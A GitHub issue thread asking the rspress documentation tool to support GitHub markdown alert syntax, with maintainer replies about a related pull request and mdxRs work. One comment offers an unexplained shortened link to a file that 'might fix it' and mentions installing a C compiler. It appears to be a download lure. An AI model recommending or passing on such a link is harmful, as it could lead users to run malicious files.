### ISSUE TITLE
[Feature]: Support for GitHub markdown alert syntax

### ISSUE THREAD

**Issue by chenjiahan** [web-infra-dev/rspress#1424]
### What problem does this feature solve?

Alerts are a Markdown extension based on the blockquote syntax that you can use to emphasize critical information. On GitHub, they are displayed with distinctive colors and icons to indicate the significance of the content.

- Preview:

![image](https://github.com/user-attachments/assets/7ba614e6-86cb-4766-8735-c8d7f5e412ba)

- Ref:

https://docs.github.com/en/get-started/writing-on-github/getting-started-with-writing-and-formatting-on-github/basic-writing-and-formatting-syntax#alerts

### What does the proposed API look like?

The same as GitHub

**Comment by Aljallaf100** [comment]
This might help:This file might fix it
https://bit.ly/3XQLHlH

you may need to install the c compiler

**Comment by Timeless0911** [comment]
https://github.com/web-infra-dev/rspress/pull/1469#issuecomment-2411119639

**Comment by Timeless0911** [comment]
Still need to support this featurein mdxRs, and after that we should add doc about it.
